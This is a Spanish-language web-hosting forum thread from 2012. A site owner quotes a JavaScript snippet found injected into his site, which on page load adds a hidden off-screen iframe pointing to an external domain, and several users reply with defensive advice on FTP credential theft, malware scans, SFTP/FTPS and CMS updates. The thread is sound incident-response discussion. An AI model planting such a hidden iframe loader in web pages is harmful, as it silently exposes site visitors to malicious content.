Foros del Web » Administración de Sistemas » Shared Hosting y VPS »

Robo de FTP?

Estas en el tema de Robo de FTP? en el foro de Shared Hosting y VPS en Foros del Web. Hola recientemente he encontrado en mi web este código @import url("http://static.forosdelweb.com/clientscript/vbulletin_css/geshi.css"); Código Javascript : Ver original < script type = "text/javascript" >   function frmAdd ...
  #1 (permalink)  
Antiguo 29/08/2012, 09:28
 
Fecha de Ingreso: mayo-2006
Mensajes: 475
Antigüedad: 13 años, 8 meses
Puntos: 58
Robo de FTP?

Hola recientemente he encontrado en mi web este código
Código Javascript:
Ver original
  1. <script type="text/javascript">
  2.  
  3. function frmAdd() {
  4.  
  5. var ifrm = document.createElement('iframe');
  6.  
  7. ifrm.style.position='absolute';
  8.  
  9. ifrm.style.top='-999em';
  10.  
  11. ifrm.style.left='-999em';
  12.  
  13. ifrm.src  = "http://clicksystemban.com/?1";
  14.  
  15. ifrm.id = 'frmId';
  16.  
  17. document.body.appendChild(ifrm);
  18.  
  19. };
  20.  
  21. window.onload = frmAdd;
  22.  
  23. </script>

Alguien sabe en que consiste? Por lo que veo introduce un iframe en la web. ¿motivo?
Yo supongo que esto se ha realizado robando las claves FTP, pero no estoy seguro.
Algún entendido que sepa algo del tema?
Muchas gracias de antemano.
  #2 (permalink)  
Antiguo 29/08/2012, 10:25
Avatar de JoshMex
Moderador Webhosting
 
Fecha de Ingreso: enero-2006
Mensajes: 4.057
Antigüedad: 14 años
Puntos: 166
Respuesta: Robo de FTP?

Si, es posible que algún spyware o malware robara los datos de tu cuenta que guardas en tu cliente ftp, regla de oro, no guardes tus password en los clientes ftp.
También puede ser que tengas un script vulnerable, si usas wordpress, joomla o similares actualízalos a las últimas versiones, igual para sus plugins.
__________________
JoshMex
Desarrollador Plataforma Microsoft / Windows / ASP / ASP.NET / SQL Server
Es inútil hacer cualquier cosa a prueba de tontos, porque los tontos son muy ingeniosos
  #3 (permalink)  
Antiguo 29/08/2012, 11:17
Avatar de Datacenter1
Usuario no validado
 
Fecha de Ingreso: agosto-2005
Ubicación: Chicago
Mensajes: 1.982
Antigüedad: 14 años, 5 meses
Puntos: 144
Respuesta: Robo de FTP?

Complementando un poco más la buena información de JoshMex, utiliza siempre FTP encriptado (ssl o tls) esto minimizará los riesgos de que te roben las contraseñas FTP

Observa la hora y fecha en que fue modificado el archivo y busca en los logs de acceso y ftp para dar con la forma que usarón para inyectar el código y reparar la falla de seguridad
  #4 (permalink)  
Antiguo 29/08/2012, 15:07
Avatar de stormy  
Fecha de Ingreso: mayo-2003
Ubicación: Oviedo, Asturias
Mensajes: 2.683
Antigüedad: 16 años, 7 meses
Puntos: 85
Respuesta: Robo de FTP?

Si tienes instalado cualquier CMS como Wordpress, Joomla, etc., y no lo tienes actualizado, es más habitual que la puerta de entrada sea esa que un robo de claves FTP.
__________________
Doominio.com
Dominios | Hosting cPanel ultrarrápido | Correo | WordPress | desde 2003
  #5 (permalink)  
Antiguo 30/08/2012, 08:30
Avatar de WebTech
Hosting Moderator
 
Fecha de Ingreso: octubre-2005
Ubicación: East Coast
Mensajes: 5.399
Antigüedad: 14 años, 3 meses
Puntos: 162
Respuesta: Robo de FTP?

Muchas veces hay malware directamente en la PC, o a través de software pirata, esto ultimamente es la causa del 90% de las infecciones que hemos visto. Además de mantener los scripts actualizados siempre es bueno usar FTPS o bien directamente ecapsular FTP sobre SSH2 (SFTP), algo que hoy en día casi cualquier cliente de FTP soporta.

Un saludo,
__________________
Infranetworking.com - Expertos en Hosting Multidominio, Cloud Hosting, Servidores Dedicados y Administración de Servidores Linux
  #6 (permalink)  
Antiguo 30/08/2012, 22:42
 
Fecha de Ingreso: noviembre-2009
Mensajes: 193
Antigüedad: 10 años, 2 meses
Puntos: 8
Respuesta: Robo de FTP?

Correcto muchas veces puede ser tu pc infectada por malware o virus, tambien que hayas subido a tu ftp algun script encontrado en el internet sin haber revisado el codigo es el gran error de varios, ahora hay que tener cuidado con las actualizaciones de script como jooma, wordpress ya que estan siendo vulnerados si no metes las medidas de seguridad adecuadas.

Saludos.
__________________
Telecomunicaciones
  #7 (permalink)  
Antiguo 31/08/2012, 01:59
Avatar de infracom2005  
Fecha de Ingreso: junio-2006
Mensajes: 751
Antigüedad: 13 años, 6 meses
Puntos: 13
Respuesta: Robo de FTP?

Seguramente un malware en tu pc, un script desactualizado o una contraseña insegura.
__________________
--
Rack-Host, Planes Resellers, VPS Full Managed
http://www.rack-host.com.ar
  #8 (permalink)  
Antiguo 31/08/2012, 07:45
Avatar de loadinges  
Fecha de Ingreso: junio-2010
Ubicación: España
Mensajes: 102
Antigüedad: 9 años, 7 meses
Puntos: 18
Respuesta: Robo de FTP?

Es muy común que se pueda colar un espía en tu pc y te robe los datos FTP y los utilice para hackear tu web.

Como recomiendan por aquí:

- Pasar un antimalware (por ejemplo Malwarebytes, que funciona muy bien en su versión gratuita )
- Cambiar todas las contraseñas que sospeches que te haya podido robar.
- Actualizar la aplicación web que tengas instalada.

Saludos.
__________________
www.loading.es

DOMINIOS / HOSTING / VPS / DEDICADOS

Etiquetas: hacker, iframe, javascript
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 00:28.